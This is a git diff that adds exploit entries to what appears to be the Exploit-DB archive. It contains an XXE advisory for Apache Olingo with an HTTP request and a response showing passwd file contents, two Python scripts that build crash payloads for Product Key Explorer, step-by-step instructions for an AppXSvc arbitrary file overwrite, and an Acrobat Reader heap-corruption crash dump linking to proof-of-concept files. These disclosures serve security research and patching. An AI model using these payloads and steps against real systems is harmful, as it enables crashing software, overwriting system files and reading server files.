diff --git a/exploits/java/webapps/47770.txt b/exploits/java/webapps/47770.txt
new file mode 100644
index 000000000..0383322ac
--- /dev/null
+++ b/exploits/java/webapps/47770.txt
@@ -0,0 +1,121 @@
+#############################################################
+#
+# COMPASS SECURITY ADVISORY
+# https://www.compass-security.com/research/advisories/
+#
+#############################################################
+#
+# Product: Apache Olingo OData 4.0
+# Vendor: Apache Foundation
+# CSNC ID: CSNC-2009-025
+# CVE ID: CVE-2019-17554
+# Subject: XML External Entity Resolution (XXE)
+# Risk: High
+# Effect: Remotely exploitable
+# Author: Archibald Haddock (advisories@compass-security.com)
+# Date: 08.11.2019
+#
+#############################################################
+
+Introduction:
+-------------
+Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
+XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
+
+
+
+Affected:
+---------
+Vulnerable:
+ * Olingo OData 4.x.x to 4.6.x
+
+Not vulnerable:
+ * Olingo OData 4.7.0
+ * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
+
+Technical Description
+---------------------
+The XML content type entity deserializer is not configured to deny the resolution of external entities.
+Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
+
+Request
+======
+POST /odata-server-sample/cars.svc/Cars HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost:8081/odata-server-sample/
+Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
+Upgrade-Insecure-Requests: 1
+content-type: application/xml
+Content-Length: 1101
+
+
+]>
+
+ Cars(1)
+
+
+ 2019-11-08T15:10:30Z
+
+
+
+
+
+
+
+
+ 1
+ F1 &xxe;
+ 2012
+ 189189.43
+ EUR
+
+
+
+
+Response
+========
+HTTP/1.1 201 Created
+Server: Apache-Coyote/1.1
+OData-Version: 4.0
+Content-Type: application/xml
+Content-Length: 960
+Date: Fri, 08 Nov 2019 14:22:35 GMT
+Connection: close
+
+Cars(1)2019-11-08T15:22:35Z1
+myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
+2012189189.43EUR
+
+
+Workaround / Fix:
+-----------------
+Configure the XML reader securely [3].
+
+In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
+private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
+
+The XMLInputFactory should be configured, not to resolve external entities:
+FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
+
+
+Timeline:
+---------
+2019-11-08: Discovery by Compass Security
+2019-11-08: Initial vendor notification
+2019-11-08: Initial vendor response
+2019-12-04: Release of fixed Version / Patch [4]
+2019-12-05: Coordinated public disclosure date
+
+
+[1] https://olingo.apache.org/
+[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
+[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
+
+Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
\ No newline at end of file
diff --git a/exploits/windows/dos/47766.py b/exploits/windows/dos/47766.py
new file mode 100755
index 000000000..03547f90d
--- /dev/null
+++ b/exploits/windows/dos/47766.py
@@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# [ About App ]
+
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+
+
+# [ POC ]
+
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+ f = open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47767.py b/exploits/windows/dos/47767.py
new file mode 100755
index 000000000..81b7e06a5
--- /dev/null
+++ b/exploits/windows/dos/47767.py
@@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# [ About App ]
+
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+
+
+# [ POC ]
+
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+ f = open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47768.txt b/exploits/windows/dos/47768.txt
new file mode 100644
index 000000000..18115e3a7
--- /dev/null
+++ b/exploits/windows/dos/47768.txt
@@ -0,0 +1,45 @@
+# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
+# Date: 2019-10-28
+# Exploit Author: Gabor Seljan
+# Vendor Homepage: https://www.microsoft.com/
+# Version: 17763.1.amd64fre.rs5_release.180914-1434
+# Tested on: Windows 10 Version 1809 for x64-based Systems
+# CVE: CVE-2019-1476
+
+# Summary:
+# AppXSvc improperly handles file hard links resulting in a low privileged user
+# being able to overwrite an arbitrary file leading to elevation of privilege.
+
+# Description:
+
+# An elevation of privilege vulnerability exists when the AppX Deployment Server
+# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
+# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
+# to overwrite an arbitrary file by deleting all registry data files before
+# creating the file hard link. As Nabeel Ahmed described in his write-up of
+# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
+# the original settings.dat template. However, additional settings.dat.LOG1 and
+# settings.dat.LOG2 files are also created during the initialization process.
+# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
+# link allows a low privileged user to overwrite an arbitrary file with registry
+# data or just simply empty it, respectively. A low privileged user could exploit
+# this vulnerability to cause denial of service by overwriting critical system
+# files.
+
+Steps to reproduce:
+1. Terminate Paint 3D processes.
+2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
+3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
+4. Execute the start ms-paint: command to run Paint 3D.
+5. Terminate Paint 3D processes.
+
+Expected result:
+It isn't possible to overwrite a file not writable by a low privileged user.
+
+Observed result:
+C:\Windows\win.ini file is overwritten with registry data.
+
+References:
+https://github.com/sgabe/CVE-2019-1476
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
+https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
\ No newline at end of file
diff --git a/exploits/windows/dos/47769.txt b/exploits/windows/dos/47769.txt
new file mode 100644
index 000000000..85e90c3bd
--- /dev/null
+++ b/exploits/windows/dos/47769.txt
@@ -0,0 +1,89 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
+eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
+CoolType!CTInit+0x3913e:
+10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194
+
+0:000> u @eip-14
+CoolType!CTInit+0x3912a:
+10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch]
+10e6c28d 8b571c mov edx,dword ptr [edi+1Ch]
+10e6c290 8b7720 mov esi,dword ptr [edi+20h]
+10e6c293 035508 add edx,dword ptr [ebp+8]
+10e6c296 8b4724 mov eax,dword ptr [edi+24h]
+10e6c299 037508 add esi,dword ptr [ebp+8]
+10e6c29c 03c6 add eax,esi
+10e6c29e 8902 mov dword ptr [edx],eax
+
+0:000> ? poi(edi+1c)
+Evaluate expression: -690332 = fff57764
+
+0:000> ? poi(ebp+8)
+Evaluate expression: 1887538240 = 70818c40
+
+0:000> !heap -p -a 70818c40
+ address 70818c40 found in
+ _DPH_HEAP_ROOT @ bfc1000
+ in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
+ 723d3b94: 70818c40 173c0 - 70818000 19000
+ unknown!fillpattern
+ 0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+ 77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+ 77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+ 77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+ 77e7ccee ntdll!RtlAllocateHeap+0x0000003e
+ 0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+ 77c2f1f6 ucrtbase!_malloc_base+0x00000026
+ 5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
+ 10e37991 CoolType!CTInit+0x00004831
+ 10e38e1b CoolType!CTInit+0x00005cbb
+ 10e68870 CoolType!CTInit+0x00035710
+ 10e683dc CoolType!CTInit+0x0003527c
+ 10e67d25 CoolType!CTInit+0x00034bc5
+ 10e65902 CoolType!CTInit+0x000327a2
+ 10e633f2 CoolType!CTInit+0x00030292
+ 10e62719 CoolType!CTInit+0x0002f5b9
+ 10e620e8 CoolType!CTInit+0x0002ef88
+ 10e62000 CoolType!CTInit+0x0002eea0
+ 108f36f1 AGM!AGMInitialize+0x0002a881
+
+
+0:000> kb
+ # ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
+01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
+02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
+03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
+04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
+05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
+06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
+07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
+08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
+09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
+0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
+0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
+0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
+0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
+0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
+0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
+--- cut ---
+
+Notes:
+
+- The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
+
+- Attached samples: poc[1-4].pdf (crashing files).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47769.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6b6e82a1f..9ea8eaf0e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6617,6 +6617,10 @@ id,file,description,date,author,type,platform,port
47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
47757,exploits/hardware/dos/47757.py,"Omron PLC 1.0.0 - Denial of Service (PoC)",2019-12-09,n0b0dy,dos,hardware,
+47766,exploits/windows/dos/47766.py,"Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)",2019-12-11,SajjadBnd,dos,windows,
+47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
+47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
+47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42075,3 +42079,4 @@ id,file,description,date,author,type,platform,port
47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
+47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,